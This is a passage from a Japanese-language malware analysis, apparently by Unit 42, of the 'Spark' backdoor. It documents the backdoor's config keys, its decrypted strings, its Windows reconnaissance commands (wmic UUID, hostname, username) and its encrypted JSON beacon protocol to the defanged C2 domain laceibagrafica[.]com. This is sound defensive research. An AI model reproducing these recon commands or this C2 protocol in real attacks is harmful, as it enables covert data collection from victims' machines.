\/td>\n<td>\u30e1\u30a4\u30f3C2\u901a\u4fe1\u30eb\u30fc\u30d7\u306b\u5165\u308b\u307e\u3067\u306e\u30b9\u30ea\u30fc\u30d7\u9593\u9694<\/td>\n<\/tr>\n<tr>\n<td>rlOa<\/td>\n<td>&lt;\u7a7a\u306e\u6587\u5b57\u5217&gt;<\/td>\n<td>\u4e0d\u660e\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u3044\u3068\u307f\u3089\u308c\u308b<\/td>\n<\/tr>\n<tr>\n<td>Eb<\/td>\n<td>1<\/td>\n<td>\u76ee\u7684\u4e0d\u660e\u3060\u304c\u3001BrandentlK\u30d5\u30a3\u30fc\u30eb\u30c9\u306eC2\u306b\u9001\u4fe1\u3055\u308c\u3066\u3044\u308b<\/td>\n<\/tr>\n<tr>\n<td>BGa<\/td>\n<td>vcJbq6nzgJk=<\/td>\n<td>\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305fbase64\u3067\u6697\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u3067\u3001\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u8b58\u5225\u5b50\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3068\u307f\u3089\u308c\u308b\"Nickname\"\u30d5\u30a3\u30fc\u30eb\u30c9<\/td>\n<\/tr>\n<tr>\n<td>qJk<\/td>\n<td>10000<\/td>\n<td>\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u7d42\u4e86\u3059\u308b\u307e\u3067\u306e\u30e1\u30a4\u30f3C2\u901a\u4fe1\u30eb\u30fc\u30d7\u306e\u7e70\u308a\u8fd4\u3057\u306e\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88683. \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u69cb\u6210\u5185\u3067\u306eJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2<\/em><\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u540c\u3058\u30eb\u30fc\u30c1\u30f3\u3092\u4f7f\u7528\u3057\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30d0\u30c3\u30d5\u30a1\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u306e\u30eb\u30fc\u30c1\u30f3\u306b\u306f\u30b9\u30ea\u30fc\u30d7\u9593\u9694\u304c\u542b\u307e\u308c\u3001\u3055\u3089\u306b\u91cd\u8981\u306a\u3053\u3068\u306b\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u3084\u3001\u3053\u308c\u3089\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u5fa9\u53f7\u306b\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u3092\u69cb\u9020\u5316\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\u540d(\u30d5\u30a1\u30fc\u30b9\u30c8 \u30cd\u30fc\u30e0)\u306e\u30ea\u30b9\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u88684\u306b\u793a\u3059\u540d\u3092\u3001C2\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u5185\u306eJSON\u30ad\u30fc\u306e\u540d\u524d\u304a\u3088\u3073\u5024\u3068\u3057\u3066\u4f7f\u7528\u3057\u307e\u3059\u3002\u4ed8\u9332\u3067\u306f\u3001\u3053\u306e\u5fa9\u53f7\u3055\u308c\u305f\u30d0\u30c3\u30d5\u30a1\u306e\u5404\u8981\u7d20\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002\u307e\u305f\u3001\u88684\u306e\u540d\u304cC2\u901a\u4fe1\u3067\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3055\u308c\u308b\u304b\u3082\u3053\u306e\u30d6\u30ed\u30b0\u306e\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u3002\u958b\u767a\u8005\u304c\u5404\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u540d\u524d\u304a\u3088\u3073\u30ad\u30fc\u3092\u5909\u66f4\u3059\u308b\u305f\u3081\u3001\u88684\u306e\u305d\u308c\u305e\u308c\u306e\u5024\u306f\u3001Spark\u30b5\u30f3\u30d7\u30eb\u3054\u3068\u306b\u4e00\u610f\u306e\u3082\u306e\u3067\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td>Lawrence<\/td>\n<td>Alanih<\/td>\n<td>Nevaeh<\/td>\n<td>Garrison<\/td>\n<td>ReeceWNM<\/td>\n<\/tr>\n<tr>\n<td>Allier<\/td>\n<td>Averizt<\/td>\n<td>LondonzO<\/td>\n<td>Zeke<\/td>\n<td>MorganE<\/td>\n<\/tr>\n<tr>\n<td>JaseN<\/td>\n<td>MathiasNbo<\/td>\n<td>JoslynKe<\/td>\n<td>ReesefP<\/td>\n<td>Winston<\/td>\n<\/tr>\n<tr>\n<td>Ivory<\/td>\n<td>BrandentlK<\/td>\n<td>AngelxEv<\/td>\n<td>FrederickT<\/td>\n<td>Jessicay<\/td>\n<\/tr>\n<tr>\n<td>Jonas<\/td>\n<td>AdalynngS<\/td>\n<td>ZaydenlnL<\/td>\n<td>KaileeXws<\/td>\n<td>VanessaFM<\/td>\n<\/tr>\n<tr>\n<td>Reginacy<\/td>\n<td>AdelineRD<\/td>\n<td>Houstonod<\/td>\n<td>EverlyY<\/td>\n<td>Jordanlzw<\/td>\n<\/tr>\n<tr>\n<td>TrumanRd<\/td>\n<td>CollinsPM<\/td>\n<td>Maximiliano<\/td>\n<td>CallieVK<\/td>\n<td>Aryana<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88684. C2\u901a\u4fe1\u3067\u4f7f\u7528\u3059\u308bJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2\u3068\u3057\u3066Spark\u304c\u4f7f\u7528\u3059\u308b\u540d(\u30d5\u30a1\u30fc\u30b9\u30c8 \u30cd\u30fc\u30e0)<\/em><\/span><\/p>\n<p>C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u3092\u884c\u3046\u524d\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9\u306b\u52a0\u3048\u3001\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u30c7\u30d0\u30c3\u30b0\u306b\u4f7f\u7528\u3059\u308b\u6587\u5b57\u5217\u3092\u542b\u3080\u30d0\u30c3\u30d5\u30a1\u3092\u3082\u30461\u3064\u5fa9\u53f7\u3057\u307e\u3059\u3002\u88685\u306f\u3001\u5fa9\u53f7\u3055\u308c\u305f\u6587\u5b57\u5217\u3068\u305d\u306e\u76ee\u7684\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u5fa9\u53f7\u3055\u308c\u305f\u6587\u5b57\u5217<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>\u76ee\u7684\u4e0d\u660e\u3060\u304c\u3001Averizt\u30d5\u30a3\u30fc\u30eb\u30c9\u306eC2\u306b\u9001\u4fe1\u3055\u308c\u3066\u3044\u308b<\/td>\n<\/tr>\n<tr>\n<td>311OEVZihfReZStoFf4cfg==<\/td>\n<td>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u30db\u30b9\u30c8\u540d\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c hostname\u306b\u306a\u308b<\/td>\n<\/tr>\n<tr>\n<td>Z9Q1WVryAIzLVSxF1yWRwg==<\/td>\n<td>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001cmd.exe\u306e\u5834\u6240\u3092\u53d6\u5f97\u3057\u3066\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b%COMSPEC%\u306b\u306a\u308b<\/td>\n<\/tr>\n<tr>\n<td>P5K5He\/2wSGGsvrFPKYpwg4KjBLyTOpbsGJwm1DckoyGK8eXeNMZCQBfHzkYRSjJlGcw6Ckn41X0MY3zJcU65uMvxpABv\/g+ttABRJsG7js=<\/td>\n<td>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30b7\u30b9\u30c6\u30e0\u306eUUID\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c wmic csproduct get UUID | more +1 | cmd \/q \/v:on \/c \"set\/p .=&amp;echo(!.!\"\u306b\u306a\u308b<\/td>\n<\/tr>\n<tr>\n<td>AykC+x26hhd5DfrB\/yly9gXcFsIlVxO9<\/td>\n<td>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30ed\u30b0\u30a4\u30f3 \u30a2\u30ab\u30a6\u30f3\u30c8\u306e\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c echo %username%\u306b\u306a\u308b<\/td>\n<\/tr>\n<tr>\n<td>ok<\/td>\n<td>\u30b3\u30de\u30f3\u30c9\u306e\u6b63\u5e38\u306a\u5b9f\u884c\u3092\u793a\u3059\u6c4e\u7528\u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<tr>\n<td>Create Pipe Error<\/td>\n<td>\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u30d1\u30a4\u30d7\u306e\u4f5c\u6210\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<tr>\n<td>Create processa error<\/td>\n<td>\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<tr>\n<td>Get exit code process error<\/td>\n<td>\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u3092\u8a66\u307f\u305f\u3068\u304d\u306bGetExitCodeProcess\u3092\u30b3\u30fc\u30eb\u3057\u3066\u30a8\u30e9\u30fc \u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u53d6\u5f97\u3059\u308b\u969b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<tr>\n<td>0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&amp;*()_+<\/td>\n<td>\u4e0d\u660e\u3002\u3053\u306e\u30b3\u30fc\u30c9\u3067\u306f\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u3044\u3068\u601d\u308f\u308c\u307e\u3059<\/td>\n<\/tr>\n<tr>\n<td>Set handle information error<\/td>\n<td>\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30aa\u30d6\u30b8\u30a7\u30af\u30c8 \u30cf\u30f3\u30c9\u30eb\u3092\u7d99\u627f\u3059\u308b\u305f\u3081\u306b\u4f5c\u6210\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306estdout\u306e\u8a2d\u5b9a\u3092\u8a66\u307f\u305f\u3068\u304d\u3001SetHandleInformation\u306e\u547c\u3073\u51fa\u3057\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<tr>\n<td>Wait for single object error<\/td>\n<td>\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u3092\u8a66\u307f\u305f\u5f8c\u3001WaitForSingleObject\u306e\u547c\u3073\u51fa\u3057\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88685. \u30da\u30a4\u30ed\u30fc\u30c9\u304cC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u306b\u4f7f\u7528\u3059\u308b\u30d0\u30c3\u30d5\u30a1\u5185\u306eJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2<\/em><\/span><\/p>\n<h3><a id=\"post-105222-spark-c2-communications\"><\/a>Spark C2\u901a\u4fe1<\/h3>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30c7\u30fc\u30bf \u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306bbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u542b\u3081\u3066HTTP POST\u8981\u6c42\u3092\u767a\u884c\u3059\u308b\u3053\u3068\u3067\u305d\u306eC2\u30b5\u30fc\u30d0\u30fc\u306elaceibagrafica[.]com\u3068\u901a\u4fe1\u3057\u307e\u3059\u3002\u3053\u308c\u307e\u3067\u306b\u3053\u306eC2\u30c1\u30e3\u30cd\u30eb\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u3066\u3044\u306a\u3044\u305f\u3081\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3068C2\u30b5\u30fc\u30d0\u30fc\u306e\u9593\u306e\u9001\u53d7\u4fe1\u306e\u6982\u8981\u3092\u793a\u3057\u3001\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u88684\u306e\u540d\u524d\u3092\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u304b\u3092\u793a\u3057\u307e\u3059\u3002\u79c1\u305f\u3061\u306f\u3001\u3053\u306e\u5206\u6790\u3092\u884c\u3046\u305f\u3081\u306bC2\u30b5\u30fc\u30d0\u30fc\u3092\u4f5c\u6210\u3057\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u3084\u308a\u53d6\u308a\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3001\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u306eHTTP\u5fdc\u7b54\u306e\u3059\u3079\u3066\u304c\u3001C2\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u958b\u767a\u3057\u305f\u653b\u6483\u8005\u304b\u3089\u3067\u306a\u304f\u3001\u79c1\u305f\u3061\u304c\u4f5c\u6210\u3057\u305fC2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u884c\u308f\u308c\u308b\u3088\u3046\u306b\u3057\u307e\u3057\u305f\u3002\u56f36\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u305d\u306eC2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u305f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u3078\u306e\u30a2\u30a6\u30c8\u30d0\u30f3\u30c9\u8981\u6c42\u306f\u3059\u3079\u3066\u8996\u899a\u7684\u306b\u985e\u4f3c\u3057\u3066\u3044\u307e\u3059\u3002\u3069\u308c\u3082\u3001\u540c\u3058URL\u306b\u5bfe\u3057\u3066HTTP POST\u8981\u6c42\u3092\u884c\u3044\u3001\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3067\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1408\" height=\"258\"  class=\"wp-image-105235 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-6-initial-beacon-sent-from-payload-to-c2-se.png\" alt=\"Figure 6.Initial beacon sent from payload to C2 server\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f36. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u308b\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3<\/span><\/p>\n<p>\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u5185\u306e\u30c7\u30fc\u30bf \u30bb\u30af\u30b7\u30e7\u30f3\u306f\u3001\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001JSON\u30e1\u30c3\u30bb\u30fc\u30b8{\"CallieVK\":\"W10=\",\"ReeceWNM\":\"Jessicay\"}\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306eJSON\u30e1\u30c3\u30bb\u30fc\u30b8\u306b\u306f\u30012\u3064\u306e\u30ad\u30fc\/\u5024\u306e\u30da\u30a2\u304c\u3042\u308a\u307e\u3059\u3002\"ReeceWNM\"\u30ad\u30fc\u3068\u305d\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u793a\u3059\u5024\u304a\u3088\u3073\"CallieVK\"\u3068\u3044\u3046\u30ad\u30fc\u3068\u305d\u306e\u30c7\u30fc\u30bf\u3092\u793a\u3059\u5024\u3067\u3059\u3002\u4f8b\u3048\u3070\u3001\"ReeceWNM\"\u30ad\u30fc\u306b\u306f\"Jessicay\"\u3068\u3044\u3046\u540d\u524d\u304c\u542b\u307e\u308c\u3001\u3053\u308c\u306f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u793a\u3059\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306fC2\u30b5\u30fc\u30d0\u30fc\u306e\u5fdc\u7b54\u3092\u5fa9\u53f7\u3057\u3001\"EverlyY\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u63a2\u3057\u3066\u305d\u306e\u5024\u3092\u30b9\u30ea\u30fc\u30d7\u9593\u9694\u3068\u3057\u3066\u4f7f\u7528\u3057\u3066\u304b\u3089\u7d9a\u884c\u3057\u307e\u3059\u3002\u56f37\u306f\u3001\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u306b\u5bfe\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306e\u5fdc\u7b54\u3092\u793a\u3057\u3066\u304a\u308a\u3001\u305d\u306e\u5fdc\u7b54\u306f{\"EverlyY\": 0}\u306b\u5fa9\u53f7\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"708\" height=\"266\"  class=\"wp-image-105237 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-7-initial-beacon-sent-from-payload-to-c2-s.png\" alt=\"Figure 7. Initial beacon sent from payload to C2 server\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f37. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u305f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001EverlyY\u5fdc\u7b54\u3092\u53d7\u4fe1\u3057\u305f\u5f8c\u3001'cmd.exe'\u3092\u4f7f\u7528\u3057\u3066\u6b21\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3001\u5177\u4f53\u7684\u306b\u306f\u30e6\u30fc\u30b6\u30fc\u540d\u3001\u30db\u30b9\u30c8\u540d\u3001\u304a\u3088\u3073\u30b7\u30b9\u30c6\u30e0\u56fa\u6709\u306eUUID\u3092\u53ce\u96c6\u3057\u307e\u3059\u3002<\/p>\n<ol>\n<li>wmic csproduct get UUID | more +1 | cmd \/q \/v:on \/c \"set\/p .=&amp;echo(!.!\"<\/li>\n<li>hostname<\/li>\n<li>echo %username%<\/li>\n<\/ol>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u305d\u308c\u305e\u308c\u3092\u3001JSON\u306bbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3067\u30d5\u30a3\u30fc\u30eb\u30c9\u540d\"ZaydenlnL\"\u5185\u306b\u4fdd\u5b58\u3057\u3001\"AngelxEv\"\u3068\u3044\u3046\u540d\u3092\u4f7f\u7528\u3057\u3066\u30c7\u30fc\u30bf\u306e\u30bf\u30a4\u30d7\u3092\u8868\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u524d\u8ff0\u306e\u30ea\u30b9\u30c8\u306e\u7d50\u679c\u306b\u5bfe\u5fdc\u3057\u305f\u6570\u5b57\u3067\u3042\u308a\u30011\u306fUUID\u30012\u306f\u30db\u30b9\u30c8\u540d\u30013\u306f\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u8868\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e3\u3064\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\"Maximiliano\"\u3068\u3044\u3046\u540d\u524d\u306eJSON\u914d\u5217\u306b\u8ffd\u52a0\u3055\u308c\u3066\u3001C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6b21\u306e\u3088\u3046\u306bJSON\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u683c\u7d0d\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"Maximiliano\":[{\"AngelxEv\":1,\"Houstonod\":1,\"ZaydenlnL\":\"&lt;base64 encoded ciphertext of UUID&gt;\"},{\"AngelxEv\":3,\"Houstonod\":1,\"ZaydenlnL\":\"&lt;base64 encoded ciphertext of username&gt;\"},{\"AngelxEv\":2,\"Houstonod\":1,\"ZaydenlnL\":\"&lt;base64 encoded ciphertext of hostname&gt;\"}]}<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u60c5\u5831JSON\u306b\"CallieVK\"\u5024\u3092\u8a2d\u5b9a\u3057\u3001\"ReeceWNM\"\u306e\u5024\u306b\u901a\u4fe1\u30bf\u30a4\u30d7\"JoslynKe\"\u3092\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u3067\u3001\u30a2\u30a6\u30c8\u30d0\u30a6\u30f3\u30c9\u901a\u4fe1JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u7d50\u679c\u306eJSON\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"CallieVK\":\"&lt;base64 encoded ciphertext of system information \"Maximiliano\" JSON array&gt;\",\"ReeceWNM\":\"JoslynKe\"}<\/span><\/p>\n<p>\u7d50\u679c\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\u56f38\u306e\u4f8b\u306e\u8981\u6c42\u306e\u3088\u3046\u306b\u3001base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u3001HTTP POST\u30c7\u30fc\u30bf\u5185\u306b\u683c\u7d0d\u3055\u308c\u3066C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1576\" height=\"528\"  class=\"wp-image-105239 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-8-system-information-sent-from-payload-to.png\" alt=\"Figure 8. System information sent from payload to C2 server\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f38. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u308b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u305f\u5f8c\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306e\u5fdc\u7b54\u5185\u3067\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u56f39\u306f\u3001\u3053\u306e\u8981\u6c42\u306b\u5bfe\u3059\u308b\u5fdc\u7b54\u3092\u793a\u3057\u3066\u304a\u308a\u3001\u3053\u308c\u306b\u542b\u307e\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u89e3\u6790\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1584\" height=\"370\"  class=\"wp-image-105241 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-9-c2-server-response-containing-ciphertext.png\" alt=\"Figure 9. C2 server response containing ciphertext containing a command line command to execute\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f39. \u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b3\u30de\u30f3\u30c9\u3092\u542b\u3080\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u304c\u542b\u307e\u308c\u305fC2\u30b5\u30fc\u30d0\u30fc\u5fdc\u7b54<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b3\u30de\u30f3\u30c9 \u30cf\u30f3\u30c9\u30e9\u3092\u6301\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001CreateProcessW API\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067C2\u306e\u5fdc\u7b54\u5185\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u51e6\u7406\u3057\u3066\u3001\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u305f\u308a\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 